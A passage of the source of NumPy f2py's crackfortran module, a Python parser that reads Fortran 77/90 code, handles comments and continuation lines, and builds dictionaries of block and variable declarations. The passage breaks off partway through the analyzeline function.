#!/usr/bin/env python3 """ crackfortran --- read fortran (77,90) code and extract declaration information. Copyright 1999-2004 Pearu Peterson all rights reserved, Pearu Peterson <pearu@ioc.ee> Permission to use, modify, and distribute this software is given under the terms of the NumPy License. NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK. $Date: 2005/09/27 07:13:49 $ Pearu Peterson Usage of crackfortran: ====================== Command line keys: -quiet,-verbose,-fix,-f77,-f90,-show,-h <pyffilename> -m <module name for f77 routines>,--ignore-contains Functions: crackfortran, crack2fortran The following Fortran statements/constructions are supported (or will be if needed): block data,byte,call,character,common,complex,contains,data, dimension,double complex,double precision,end,external,function, implicit,integer,intent,interface,intrinsic, logical,module,optional,parameter,private,public, program,real,(sequence?),subroutine,type,use,virtual, include,pythonmodule Note: 'virtual' is mapped to 'dimension'. Note: 'implicit integer (z) static (z)' is 'implicit static (z)' (this is minor bug). Note: code after 'contains' will be ignored until its scope ends. Note: 'common' statement is extended: dimensions are moved to variable definitions Note: f2py directive: <commentchar>f2py<line> is read as <line> Note: pythonmodule is introduced to represent Python module Usage: `postlist=crackfortran(files)` `postlist` contains declaration information read from the list of files `files`. `crack2fortran(postlist)` returns a fortran code to be saved to pyf-file `postlist` has the following structure: *** it is a list of dictionaries containing `blocks': B = {'block','body','vars','parent_block'[,'name','prefix','args','result', 'implicit','externals','interfaced','common','sortvars', 'commonvars','note']} B['block'] = 'interface' | 'function' | 'subroutine' | 'module' | 'program' | 'block data' | 'type' | 'pythonmodule' B['body'] --- list containing `subblocks' with the same structure as `blocks' B['parent_block'] --- dictionary of a parent block: C['body'][<index>]['parent_block'] is C B['vars'] --- dictionary of variable definitions B['sortvars'] --- dictionary of variable definitions sorted by dependence (independent first) B['name'] --- name of the block (not if B['block']=='interface') B['prefix'] --- prefix string (only if B['block']=='function') B['args'] --- list of argument names if B['block']== 'function' | 'subroutine' B['result'] --- name of the return value (only if B['block']=='function') B['implicit'] --- dictionary {'a':<variable definition>,'b':...} | None B['externals'] --- list of variables being external B['interfaced'] --- list of variables being external and defined B['common'] --- dictionary of common blocks (list of objects) B['commonvars'] --- list of variables used in common blocks (dimensions are moved to variable definitions) B['from'] --- string showing the 'parents' of the current block B['use'] --- dictionary of modules used in current block: {<modulename>:{['only':<0|1>],['map':{<local_name1>:<use_name1>,...}]}} B['note'] --- list of LaTeX comments on the block B['f2pyenhancements'] --- optional dictionary {'threadsafe':'','fortranname':<name>, 'callstatement':<C-expr>|<multi-line block>, 'callprotoargument':<C-expr-list>, 'usercode':<multi-line block>|<list of multi-line blocks>, 'pymethoddef:<multi-line block>' } B['entry'] --- dictionary {entryname:argslist,..} B['varnames'] --- list of variable names given in the order of reading the Fortran code, useful for derived types. B['saved_interface'] --- a string of scanned routine signature, defines explicit interface *** Variable definition is a dictionary D = B['vars'][<variable name>] = {'typespec'[,'attrspec','kindselector','charselector','=','typename']} D['typespec'] = 'byte' | 'character' | 'complex' | 'double complex' | 'double precision' | 'integer' | 'logical' | 'real' | 'type' D['attrspec'] --- list of attributes (e.g. 'dimension(<arrayspec>)', 'external','intent(in|out|inout|hide|c|callback|cache|aligned4|aligned8|aligned16)', 'optional','required', etc) K = D['kindselector'] = {['*','kind']} (only if D['typespec'] = 'complex' | 'integer' | 'logical' | 'real' ) C = D['charselector'] = {['*','len','kind']} (only if D['typespec']=='character') D['='] --- initialization expression string D['typename'] --- name of the type if D['typespec']=='type' D['dimension'] --- list of dimension bounds D['intent'] --- list of intent specifications D['depend'] --- list of variable names on which current variable depends on D['check'] --- list of C-expressions; if C-expr returns zero, exception is raised D['note'] --- list of LaTeX comments on the variable *** Meaning of kind/char selectors (few examples): D['typespec>']*K['*'] D['typespec'](kind=K['kind']) character*C['*'] character(len=C['len'],kind=C['kind']) (see also fortran type declaration statement formats below) Fortran 90 type declaration statement format (F77 is subset of F90) ==================================================================== (Main source: IBM XL Fortran 5.1 Language Reference Manual) type declaration = <typespec> [[<attrspec>]::] <entitydecl> <typespec> = byte | character[<charselector>] | complex[<kindselector>] | double complex | double precision | integer[<kindselector>] | logical[<kindselector>] | real[<kindselector>] | type(<typename>) <charselector> = * <charlen> | ([len=]<len>[,[kind=]<kind>]) | (kind=<kind>[,len=<len>]) <kindselector> = * <intlen> | ([kind=]<kind>) <attrspec> = comma separated list of attributes. Only the following attributes are used in building up the interface: external (parameter --- affects '=' key) optional intent Other attributes are ignored. <intentspec> = in | out | inout <arrayspec> = comma separated list of dimension bounds. <entitydecl> = <name> [[*<charlen>][(<arrayspec>)] | [(<arrayspec>)]*<charlen>] [/<init_expr>/ | =<init_expr>] [,<entitydecl>] In addition, the following attributes are used: check,depend,note TODO: * Apply 'parameter' attribute (e.g. 'integer parameter :: i=2' 'real x(i)' -> 'real x(2)') The above may be solved by creating appropriate preprocessor program, for example. """ import sys import string import fileinput import re import os import copy import platform from . import __version__ # The environment provided by auxfuncs.py is needed for some calls to eval. # As the needed functions cannot be determined by static inspection of the # code, it is safest to use import * pending a major refactoring of f2py. from .auxfuncs import * f2py_version = __version__.version # Global flags: strictf77 = 1 # Ignore `!' comments unless line[0]=='!' sourcecodeform = 'fix' # 'fix','free' quiet = 0 # Be verbose if 0 (Obsolete: not used any more) verbose = 1 # Be quiet if 0, extra verbose if > 1. tabchar = 4 * ' ' pyffilename = '' f77modulename = '' skipemptyends = 0 # for old F77 programs without 'program' statement ignorecontains = 1 dolowercase = 1 debug = [] # Global variables beginpattern = '' currentfilename = '' expectbegin = 1 f90modulevars = {} filepositiontext = '' gotnextfile = 1 groupcache = None groupcounter = 0 grouplist = {groupcounter: []} groupname = '' include_paths = [] neededmodule = -1 onlyfuncs = [] previous_context = None skipblocksuntil = -1 skipfuncs = [] skipfunctions = [] usermodules = [] def reset_global_f2py_vars(): global groupcounter, grouplist, neededmodule, expectbegin global skipblocksuntil, usermodules, f90modulevars, gotnextfile global filepositiontext, currentfilename, skipfunctions, skipfuncs global onlyfuncs, include_paths, previous_context global strictf77, sourcecodeform, quiet, verbose, tabchar, pyffilename global f77modulename, skipemptyends, ignorecontains, dolowercase, debug # flags strictf77 = 1 sourcecodeform = 'fix' quiet = 0 verbose = 1 tabchar = 4 * ' ' pyffilename = '' f77modulename = '' skipemptyends = 0 ignorecontains = 1 dolowercase = 1 debug = [] # variables groupcounter = 0 grouplist = {groupcounter: []} neededmodule = -1 expectbegin = 1 skipblocksuntil = -1 usermodules = [] f90modulevars = {} gotnextfile = 1 filepositiontext = '' currentfilename = '' skipfunctions = [] skipfuncs = [] onlyfuncs = [] include_paths = [] previous_context = None def outmess(line, flag=1): global filepositiontext if not verbose: return if not quiet: if flag: sys.stdout.write(filepositiontext) sys.stdout.write(line) re._MAXCACHE = 50 defaultimplicitrules = {} for c in "abcdefghopqrstuvwxyz$_": defaultimplicitrules[c] = {'typespec': 'real'} for c in "ijklmn": defaultimplicitrules[c] = {'typespec': 'integer'} del c badnames = {} invbadnames = {} for n in ['int', 'double', 'float', 'char', 'short', 'long', 'void', 'case', 'while', 'return', 'signed', 'unsigned', 'if', 'for', 'typedef', 'sizeof', 'union', 'struct', 'static', 'register', 'new', 'break', 'do', 'goto', 'switch', 'continue', 'else', 'inline', 'extern', 'delete', 'const', 'auto', 'len', 'rank', 'shape', 'index', 'slen', 'size', '_i', 'max', 'min', 'flen', 'fshape', 'string', 'complex_double', 'float_double', 'stdin', 'stderr', 'stdout', 'type', 'default']: badnames[n] = n + '_bn' invbadnames[n + '_bn'] = n def rmbadname1(name): if name in badnames: errmess('rmbadname1: Replacing "%s" with "%s".\n' % (name, badnames[name])) return badnames[name] return name def rmbadname(names): return [rmbadname1(_m) for _m in names] def undo_rmbadname1(name): if name in invbadnames: errmess('undo_rmbadname1: Replacing "%s" with "%s".\n' % (name, invbadnames[name])) return invbadnames[name] return name def undo_rmbadname(names): return [undo_rmbadname1(_m) for _m in names] def getextension(name): i = name.rfind('.') if i == -1: return '' if '\\' in name[i:]: return '' if '/' in name[i:]: return '' return name[i + 1:] is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match _has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search _has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search _has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search _free_f90_start = re.compile(r'[^c*]\s*[^\s\d\t]', re.I).match def is_free_format(file): """Check if file is in free format Fortran.""" # f90 allows both fixed and free format, assuming fixed unless # signs of free format are detected. result = 0 with open(file, 'r') as f: line = f.readline() n = 15 # the number of non-comment lines to scan for hints if _has_f_header(line): n = 0 elif _has_f90_header(line): n = 0 result = 1 while n > 0 and line: if line[0] != '!' and line.strip(): n -= 1 if (line[0] != '\t' and _free_f90_start(line[:5])) or line[-2:-1] == '&': result = 1 break line = f.readline() return result # Read fortran (77,90) code def readfortrancode(ffile, dowithline=show, istop=1): """ Read fortran codes from files and 1) Get rid of comments, line continuations, and empty lines; lower cases. 2) Call dowithline(line) on every line. 3) Recursively call itself when statement \"include '<filename>'\" is met. """ global gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77 global beginpattern, quiet, verbose, dolowercase, include_paths if not istop: saveglobals = gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\ beginpattern, quiet, verbose, dolowercase if ffile == []: return localdolowercase = dolowercase cont = 0 finalline = '' ll = '' includeline = re.compile( r'\s*include\s*(\'|")(?P<name>[^\'"]*)(\'|")', re.I) cont1 = re.compile(r'(?P<line>.*)&\s*\Z') cont2 = re.compile(r'(\s*&|)(?P<line>.*)') mline_mark = re.compile(r".*?'''") if istop: dowithline('', -1) ll, l1 = '', '' spacedigits = [' '] + [str(_m) for _m in range(10)] filepositiontext = '' fin = fileinput.FileInput(ffile) while True: l = fin.readline() if not l: break if fin.isfirstline(): filepositiontext = '' currentfilename = fin.filename() gotnextfile = 1 l1 = l strictf77 = 0 sourcecodeform = 'fix' ext = os.path.splitext(currentfilename)[1] if is_f_file(currentfilename) and \ not (_has_f90_header(l) or _has_fix_header(l)): strictf77 = 1 elif is_free_format(currentfilename) and not _has_fix_header(l): sourcecodeform = 'free' if strictf77: beginpattern = beginpattern77 else: beginpattern = beginpattern90 outmess('\tReading file %s (format:%s%s)\n' % (repr(currentfilename), sourcecodeform, strictf77 and ',strict' or '')) l = l.expandtabs().replace('\xa0', ' ') # Get rid of newline characters while not l == '': if l[-1] not in "\n\r\f": break l = l[:-1] if not strictf77: (l, rl) = split_by_unquoted(l, '!') l += ' ' if rl[:5].lower() == '!f2py': # f2py directive l, _ = split_by_unquoted(l + 4 * ' ' + rl[5:], '!') if l.strip() == '': # Skip empty line cont = 0 continue if sourcecodeform == 'fix': if l[0] in ['*', 'c', '!', 'C', '#']: if l[1:5].lower() == 'f2py': # f2py directive l = ' ' + l[5:] else: # Skip comment line cont = 0 continue elif strictf77: if len(l) > 72: l = l[:72] if not (l[0] in spacedigits): raise Exception('readfortrancode: Found non-(space,digit) char ' 'in the first column.\n\tAre you sure that ' 'this code is in fix form?\n\tline=%s' % repr(l)) if (not cont or strictf77) and (len(l) > 5 and not l[5] == ' '): # Continuation of a previous line ll = ll + l[6:] finalline = '' origfinalline = '' else: if not strictf77: # F90 continuation r = cont1.match(l) if r: l = r.group('line') # Continuation follows .. if cont: ll = ll + cont2.match(l).group('line') finalline = '' origfinalline = '' else: # clean up line beginning from possible digits. l = ' ' + l[5:] if localdolowercase: finalline = ll.lower() else: finalline = ll origfinalline = ll ll = l cont = (r is not None) else: # clean up line beginning from possible digits. l = ' ' + l[5:] if localdolowercase: finalline = ll.lower() else: finalline = ll origfinalline = ll ll = l elif sourcecodeform == 'free': if not cont and ext == '.pyf' and mline_mark.match(l): l = l + '\n' while True: lc = fin.readline() if not lc: errmess( 'Unexpected end of file when reading multiline\n') break l = l + lc if mline_mark.match(lc): break l = l.rstrip() r = cont1.match(l) if r: l = r.group('line') # Continuation follows .. if cont: ll = ll + cont2.match(l).group('line') finalline = '' origfinalline = '' else: if localdolowercase: finalline = ll.lower() else: finalline = ll origfinalline = ll ll = l cont = (r is not None) else: raise ValueError( "Flag sourcecodeform must be either 'fix' or 'free': %s" % repr(sourcecodeform)) filepositiontext = 'Line #%d in %s:"%s"\n\t' % ( fin.filelineno() - 1, currentfilename, l1) m = includeline.match(origfinalline) if m: fn = m.group('name') if os.path.isfile(fn): readfortrancode(fn, dowithline=dowithline, istop=0) else: include_dirs = [ os.path.dirname(currentfilename)] + include_paths foundfile = 0 for inc_dir in include_dirs: fn1 = os.path.join(inc_dir, fn) if os.path.isfile(fn1): foundfile = 1 readfortrancode(fn1, dowithline=dowithline, istop=0) break if not foundfile: outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % ( repr(fn), os.pathsep.join(include_dirs))) else: dowithline(finalline) l1 = ll if localdolowercase: finalline = ll.lower() else: finalline = ll origfinalline = ll filepositiontext = 'Line #%d in %s:"%s"\n\t' % ( fin.filelineno() - 1, currentfilename, l1) m = includeline.match(origfinalline) if m: fn = m.group('name') if os.path.isfile(fn): readfortrancode(fn, dowithline=dowithline, istop=0) else: include_dirs = [os.path.dirname(currentfilename)] + include_paths foundfile = 0 for inc_dir in include_dirs: fn1 = os.path.join(inc_dir, fn) if os.path.isfile(fn1): foundfile = 1 readfortrancode(fn1, dowithline=dowithline, istop=0) break if not foundfile: outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % ( repr(fn), os.pathsep.join(include_dirs))) else: dowithline(finalline) filepositiontext = '' fin.close() if istop: dowithline('', 1) else: gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\ beginpattern, quiet, verbose, dolowercase = saveglobals # Crack line beforethisafter = r'\s*(?P<before>%s(?=\s*(\b(%s)\b)))' + \ r'\s*(?P<this>(\b(%s)\b))' + \ r'\s*(?P<after>%s)\s*\Z' ## fortrantypes = r'character|logical|integer|real|complex|double\s*(precision\s*(complex|)|complex)|type(?=\s*\([\w\s,=(*)]*\))|byte' typespattern = re.compile( beforethisafter % ('', fortrantypes, fortrantypes, '.*'), re.I), 'type' typespattern4implicit = re.compile(beforethisafter % ( '', fortrantypes + '|static|automatic|undefined', fortrantypes + '|static|automatic|undefined', '.*'), re.I) # functionpattern = re.compile(beforethisafter % ( r'([a-z]+[\w\s(=*+-/)]*?|)', 'function', 'function', '.*'), re.I), 'begin' subroutinepattern = re.compile(beforethisafter % ( r'[a-z\s]*?', 'subroutine', 'subroutine', '.*'), re.I), 'begin' # modulepattern=re.compile(beforethisafter%('[a-z\s]*?','module','module','.*'),re.I),'begin' # groupbegins77 = r'program|block\s*data' beginpattern77 = re.compile( beforethisafter % ('', groupbegins77, groupbegins77, '.*'), re.I), 'begin' groupbegins90 = groupbegins77 + \ r'|module(?!\s*procedure)|python\s*module|interface|type(?!\s*\()' beginpattern90 = re.compile( beforethisafter % ('', groupbegins90, groupbegins90, '.*'), re.I), 'begin' groupends = (r'end|endprogram|endblockdata|endmodule|endpythonmodule|' r'endinterface|endsubroutine|endfunction') endpattern = re.compile( beforethisafter % ('', groupends, groupends, r'[\w\s]*'), re.I), 'end' # endifs='end\s*(if|do|where|select|while|forall)' endifs = r'(end\s*(if|do|where|select|while|forall))|(module\s*procedure)' endifpattern = re.compile( beforethisafter % (r'[\w]*?', endifs, endifs, r'[\w\s]*'), re.I), 'endif' # implicitpattern = re.compile( beforethisafter % ('', 'implicit', 'implicit', '.*'), re.I), 'implicit' dimensionpattern = re.compile(beforethisafter % ( '', 'dimension|virtual', 'dimension|virtual', '.*'), re.I), 'dimension' externalpattern = re.compile( beforethisafter % ('', 'external', 'external', '.*'), re.I), 'external' optionalpattern = re.compile( beforethisafter % ('', 'optional', 'optional', '.*'), re.I), 'optional' requiredpattern = re.compile( beforethisafter % ('', 'required', 'required', '.*'), re.I), 'required' publicpattern = re.compile( beforethisafter % ('', 'public', 'public', '.*'), re.I), 'public' privatepattern = re.compile( beforethisafter % ('', 'private', 'private', '.*'), re.I), 'private' intrinsicpattern = re.compile( beforethisafter % ('', 'intrinsic', 'intrinsic', '.*'), re.I), 'intrinsic' intentpattern = re.compile(beforethisafter % ( '', 'intent|depend|note|check', 'intent|depend|note|check', r'\s*\(.*?\).*'), re.I), 'intent' parameterpattern = re.compile( beforethisafter % ('', 'parameter', 'parameter', r'\s*\(.*'), re.I), 'parameter' datapattern = re.compile( beforethisafter % ('', 'data', 'data', '.*'), re.I), 'data' callpattern = re.compile( beforethisafter % ('', 'call', 'call', '.*'), re.I), 'call' entrypattern = re.compile( beforethisafter % ('', 'entry', 'entry', '.*'), re.I), 'entry' callfunpattern = re.compile( beforethisafter % ('', 'callfun', 'callfun', '.*'), re.I), 'callfun' commonpattern = re.compile( beforethisafter % ('', 'common', 'common', '.*'), re.I), 'common' usepattern = re.compile( beforethisafter % ('', 'use', 'use', '.*'), re.I), 'use' containspattern = re.compile( beforethisafter % ('', 'contains', 'contains', ''), re.I), 'contains' formatpattern = re.compile( beforethisafter % ('', 'format', 'format', '.*'), re.I), 'format' # Non-fortran and f2py-specific statements f2pyenhancementspattern = re.compile(beforethisafter % ('', 'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef', 'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef', '.*'), re.I | re.S), 'f2pyenhancements' multilinepattern = re.compile( r"\s*(?P<before>''')(?P<this>.*?)(?P<after>''')\s*\Z", re.S), 'multiline' ## def split_by_unquoted(line, characters): """ Splits the line into (line[:i], line[i:]), where i is the index of first occurrence of one of the characters not within quotes, or len(line) if no such index exists """ assert not (set('"\'') & set(characters)), "cannot split by unquoted quotes" r = re.compile( r"\A(?P<before>({single_quoted}|{double_quoted}|{not_quoted})*)" r"(?P<after>{char}.*)\Z".format( not_quoted="[^\"'{}]".format(re.escape(characters)), char="[{}]".format(re.escape(characters)), single_quoted=r"('([^'\\]|(\\.))*')", double_quoted=r'("([^"\\]|(\\.))*")')) m = r.match(line) if m: d = m.groupdict() return (d["before"], d["after"]) return (line, "") def _simplifyargs(argsline): a = [] for n in markoutercomma(argsline).split('@,@'): for r in '(),': n = n.replace(r, '_') a.append(n) return ','.join(a) crackline_re_1 = re.compile(r'\s*(?P<result>\b[a-z]+[\w]*\b)\s*[=].*', re.I) def crackline(line, reset=0): """ reset=-1 --- initialize reset=0 --- crack the line reset=1 --- final check if mismatch of blocks occurred Cracked data is saved in grouplist[0]. """ global beginpattern, groupcounter, groupname, groupcache, grouplist global filepositiontext, currentfilename, neededmodule, expectbegin global skipblocksuntil, skipemptyends, previous_context, gotnextfile _, has_semicolon = split_by_unquoted(line, ";") if has_semicolon and not (f2pyenhancementspattern[0].match(line) or multilinepattern[0].match(line)): # XXX: non-zero reset values need testing assert reset == 0, repr(reset) # split line on unquoted semicolons line, semicolon_line = split_by_unquoted(line, ";") while semicolon_line: crackline(line, reset) line, semicolon_line = split_by_unquoted(semicolon_line[1:], ";") crackline(line, reset) return if reset < 0: groupcounter = 0 groupname = {groupcounter: ''} groupcache = {groupcounter: {}} grouplist = {groupcounter: []} groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['vars'] = {} groupcache[groupcounter]['block'] = '' groupcache[groupcounter]['name'] = '' neededmodule = -1 skipblocksuntil = -1 return if reset > 0: fl = 0 if f77modulename and neededmodule == groupcounter: fl = 2 while groupcounter > fl: outmess('crackline: groupcounter=%s groupname=%s\n' % (repr(groupcounter), repr(groupname))) outmess( 'crackline: Mismatch of blocks encountered. Trying to fix it by assuming "end" statement.\n') grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 if f77modulename and neededmodule == groupcounter: grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 # end interface grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 # end module neededmodule = -1 return if line == '': return flag = 0 for pat in [dimensionpattern, externalpattern, intentpattern, optionalpattern, requiredpattern, parameterpattern, datapattern, publicpattern, privatepattern, intrinsicpattern, endifpattern, endpattern, formatpattern, beginpattern, functionpattern, subroutinepattern, implicitpattern, typespattern, commonpattern, callpattern, usepattern, containspattern, entrypattern, f2pyenhancementspattern, multilinepattern ]: m = pat[0].match(line) if m: break flag = flag + 1 if not m: re_1 = crackline_re_1 if 0 <= skipblocksuntil <= groupcounter: return if 'externals' in groupcache[groupcounter]: for name in groupcache[groupcounter]['externals']: if name in invbadnames: name = invbadnames[name] if 'interfaced' in groupcache[groupcounter] and name in groupcache[groupcounter]['interfaced']: continue m1 = re.match( r'(?P<before>[^"]*)\b%s\b\s*@\(@(?P<args>[^@]*)@\)@.*\Z' % name, markouterparen(line), re.I) if m1: m2 = re_1.match(m1.group('before')) a = _simplifyargs(m1.group('args')) if m2: line = 'callfun %s(%s) result (%s)' % ( name, a, m2.group('result')) else: line = 'callfun %s(%s)' % (name, a) m = callfunpattern[0].match(line) if not m: outmess( 'crackline: could not resolve function call for line=%s.\n' % repr(line)) return analyzeline(m, 'callfun', line) return if verbose > 1 or (verbose == 1 and currentfilename.lower().endswith('.pyf')): previous_context = None outmess('crackline:%d: No pattern for line\n' % (groupcounter)) return elif pat[1] == 'end': if 0 <= skipblocksuntil < groupcounter: groupcounter = groupcounter - 1 if skipblocksuntil <= groupcounter: return if groupcounter <= 0: raise Exception('crackline: groupcounter(=%s) is nonpositive. ' 'Check the blocks.' % (groupcounter)) m1 = beginpattern[0].match((line)) if (m1) and (not m1.group('this') == groupname[groupcounter]): raise Exception('crackline: End group %s does not match with ' 'previous Begin group %s\n\t%s' % (repr(m1.group('this')), repr(groupname[groupcounter]), filepositiontext) ) if skipblocksuntil == groupcounter: skipblocksuntil = -1 grouplist[groupcounter - 1].append(groupcache[groupcounter]) grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter] del grouplist[groupcounter] groupcounter = groupcounter - 1 if not skipemptyends: expectbegin = 1 elif pat[1] == 'begin': if 0 <= skipblocksuntil <= groupcounter: groupcounter = groupcounter + 1 return gotnextfile = 0 analyzeline(m, pat[1], line) expectbegin = 0 elif pat[1] == 'endif': pass elif pat[1] == 'contains': if ignorecontains: return if 0 <= skipblocksuntil <= groupcounter: return skipblocksuntil = groupcounter else: if 0 <= skipblocksuntil <= groupcounter: return analyzeline(m, pat[1], line) def markouterparen(line): l = '' f = 0 for c in line: if c == '(': f = f + 1 if f == 1: l = l + '@(@' continue elif c == ')': f = f - 1 if f == 0: l = l + '@)@' continue l = l + c return l def markoutercomma(line, comma=','): l = '' f = 0 before, after = split_by_unquoted(line, comma + '()') l += before while after: if (after[0] == comma) and (f == 0): l += '@' + comma + '@' else: l += after[0] if after[0] == '(': f += 1 elif after[0] == ')': f -= 1 before, after = split_by_unquoted(after[1:], comma + '()') l += before assert not f, repr((f, line, l)) return l def unmarkouterparen(line): r = line.replace('@(@', '(').replace('@)@', ')') return r def appenddecl(decl, decl2, force=1): if not decl: decl = {} if not decl2: return decl if decl is decl2: return decl for k in list(decl2.keys()): if k == 'typespec': if force or k not in decl: decl[k] = decl2[k] elif k == 'attrspec': for l in decl2[k]: decl = setattrspec(decl, l, force) elif k == 'kindselector': decl = setkindselector(decl, decl2[k], force) elif k == 'charselector': decl = setcharselector(decl, decl2[k], force) elif k in ['=', 'typename']: if force or k not in decl: decl[k] = decl2[k] elif k == 'note': pass elif k in ['intent', 'check', 'dimension', 'optional', 'required']: errmess('appenddecl: "%s" not implemented.\n' % k) else: raise Exception('appenddecl: Unknown variable definition key:' + str(k)) return decl selectpattern = re.compile( r'\s*(?P<this>(@\(@.*?@\)@|[*][\d*]+|[*]\s*@\(@.*?@\)@|))(?P<after>.*)\Z', re.I) nameargspattern = re.compile( r'\s*(?P<name>\b[\w$]+\b)\s*(@\(@\s*(?P<args>[\w\s,]*)\s*@\)@|)\s*((result(\s*@\(@\s*(?P<result>\b[\w$]+\b)\s*@\)@|))|(bind\s*@\(@\s*(?P<bind>.*)\s*@\)@))*\s*\Z', re.I) callnameargspattern = re.compile( r'\s*(?P<name>\b[\w$]+\b)\s*@\(@\s*(?P<args>.*)\s*@\)@\s*\Z', re.I) real16pattern = re.compile( r'([-+]?(?:\d+(?:\.\d*)?|\d*\.\d+))[dD]((?:[-+]?\d+)?)') real8pattern = re.compile( r'([-+]?((?:\d+(?:\.\d*)?|\d*\.\d+))[eE]((?:[-+]?\d+)?)|(\d+\.\d*))') _intentcallbackpattern = re.compile(r'intent\s*\(.*?\bcallback\b', re.I) def _is_intent_callback(vdecl): for a in vdecl.get('attrspec', []): if _intentcallbackpattern.match(a): return 1 return 0 def _resolvenameargspattern(line): line = markouterparen(line) m1 = nameargspattern.match(line) if m1: return m1.group('name'), m1.group('args'), m1.group('result'), m1.group('bind') m1 = callnameargspattern.match(line) if m1: return m1.group('name'), m1.group('args'), None, None return None, [], None, None def analyzeline(m, case, line): global groupcounter, groupname, groupcache, grouplist, filepositiontext global currentfilename, f77modulename, neededinterface, neededmodule global expectbegin, gotnextfile, previous_context block = m.group('this') if case != 'multiline': previous_context = None if expectbegin and case not in ['begin', 'call', 'callfun', 'type'] \ and not skipemptyends and groupcounter < 1: newname = os.path.basename(currentfilename).split('.')[0] outmess( 'analyzeline: no group yet. Creating program group with name "%s".\n' % newname) gotnextfile = 0 groupcounter = groupcounter + 1 groupname[groupcounter] = 'program' groupcache[groupcounter] = {} grouplist[groupcounter] = [] groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['vars'] = {} groupcache[groupcounter]['block'] = 'program' groupcache[groupcounter]['name'] = newname groupcache[groupcounter]['from'] = 'fromsky' expectbegin = 0 if case in ['begin', 'call', 'callfun']: # Crack line => block,name,args,result block = block.lower() if re.match(r'block\s*data', block, re.I): block = 'block data' if re.match(r'python\s*module', block, re.I): block = 'python module' name, args, result, bind = _resolvenameargspattern(m.group('after')) if name is None: if block == 'block data': name = '_BLOCK_DATA_' else: name = '' if block not in ['interface', 'block data']: outmess('analyzeline: No name/args pattern found for line.\n') previous_context = (block, name, groupcounter) if args: args = rmbadname([x.strip() for x in markoutercomma(args).split('@,@')]) else: args = [] if '' in args: while '' in args: args.remove('') outmess( 'analyzeline: argument list is malformed (missing argument).\n') # end of crack line => block,name,args,result needmodule = 0 needinterface = 0 if case in ['call', 'callfun']: needinterface = 1 if 'args' not in groupcache[groupcounter]: return if name not in groupcache[groupcounter]['args']: return for it in grouplist[groupcounter]: if it['name'] == name: return if name in groupcache[groupcounter]['interfaced']: return block = {'call': 'subroutine', 'callfun': 'function'}[case] if f77modulename and neededmodule == -1 and groupcounter <= 1: neededmodule = groupcounter + 2 needmodule = 1 if block != 'interface': needinterface = 1 # Create new block(s) groupcounter = groupcounter + 1 groupcache[groupcounter] = {} grouplist[groupcounter] = [] if needmodule: if verbose > 1: outmess('analyzeline: Creating module block %s\n' % repr(f77modulename), 0) groupname[groupcounter] = 'module' groupcache[groupcounter]['block'] = 'python module' groupcache[groupcounter]['name'] = f77modulename groupcache[groupcounter]['from'] = '' groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['externals'] = [] groupcache[groupcounter]['interfaced'] = [] groupcache[groupcounter]['vars'] = {} groupcounter = groupcounter + 1 groupcache[groupcounter] = {} grouplist[groupcounter] = [] if needinterface: if verbose > 1: outmess('analyzeline: Creating additional interface block (groupcounter=%s).\n' % ( groupcounter), 0) groupname[groupcounter] = 'interface' groupcache[groupcounter]['block'] = 'interface' groupcache[groupcounter]['name'] = 'unknown_interface' groupcache[groupcounter]['from'] = '%s:%s' % ( groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name']) groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['externals'] = [] groupcache[groupcounter]['interfaced'] = [] groupcache[groupcounter]['vars'] = {} groupcounter = groupcounter + 1 groupcache[groupcounter] = {} grouplist[groupcounter] = [] groupname[groupcounter] = block groupcache[groupcounter]['block'] = block if not name: name = 'unknown_' + block groupcache[groupcounter]['prefix'] = m.group('before') groupcache[groupcounter]['name'] = rmbadname1(name) groupcache[groupcounter]['result'] = result if groupcounter == 1: groupcache[groupcounter]['from'] = currentfilename else: if f77modulename and groupcounter == 3: groupcache[groupcounter]['from'] = '%s:%s' % ( groupcache[groupcounter - 1]['from'], currentfilename) else: groupcache[groupcounter]['from'] = '%s:%s' % ( groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name']) for k in list(groupcache[groupcounter].keys()): if not groupcache[groupcounter][k]: del groupcache[groupcounter][k] groupcache[groupcounter]['args'] = args groupcache[groupcounter]['body'] = [] groupcache[groupcounter]['externals'] = [] groupcache[groupcounter]['interfaced'] = [] groupcache[groupcounter]['vars'] = {} groupcache[groupcounter]['entry'] = {} # end of creation if block == 'type': groupcache[groupcounter]['varnames'] = [] if case in ['call', 'callfun']: # set parents variables if name not in groupcache[groupcounter - 2]['externals']: groupcache[groupcounter - 2]['externals'].append(name) groupcache[groupcounter]['vars'] = copy.deepcopy( groupcache[groupcounter - 2]['vars']) try: del groupcache[groupcounter]['vars'][name][ groupcache[groupcounter]['vars'][name]['attrspec'].index('external')] except Exception: pass if block in ['function', 'subroutine']: # set global attributes try: groupcache[groupcounter]['vars'][name] = appenddecl( groupcache[groupcounter]['vars'][name], groupcache[groupcounter - 2]['vars']['']) except Exception: pass if case == 'callfun': # return type if result and result in groupcache[groupcounter]['vars']: if not name == result: groupcache[groupcounter]['vars'][name] = appenddecl( groupcache[groupcounter]['vars'][name], 